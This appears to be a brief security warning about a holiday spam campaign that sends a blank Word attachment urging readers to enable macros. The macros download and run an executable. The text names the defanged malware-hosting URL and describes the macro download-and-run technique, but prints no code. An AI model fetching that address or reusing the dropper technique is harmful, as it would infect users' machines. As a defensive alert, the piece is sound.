Spammers are taking advantage of the Christmas season to infect computers all over the world by emailing you a tempting word document file with the name “CHISTMAS OFFERS.docx”. With shoppers on the hunt for the best deals this holiday in terms of gifts, who wouldn’t be tempted to open such a file!
It might be tempting to open the file to see what these offers are all about. However, the document is blank and requires the user to enable macros in order to view it.By default Microsoft Office disables macros, a handy automation feature but also a huge security risk.This is where the social engineering lies and the crooks are counting on people so eager to see the promised content that they will push the button and get infected.
While the spammers who emailed the infected files actually had several macros created, you cannot see them because they were password enabled. However, you can make use of the OfficeMalScanenr tool to extract the macros code and open it in any text software. The code with which the macros are written is Visual Basic for Applications and it has the ability to download just about any file for any external URL.
By enabling content or macros, you would be enabling the code to start downloading just about anything it was written to download.The enabled macros remotely download a file from the URL hxxp://jasoncurtis.co.uk/js/bin.exe and then run it from your temp folder.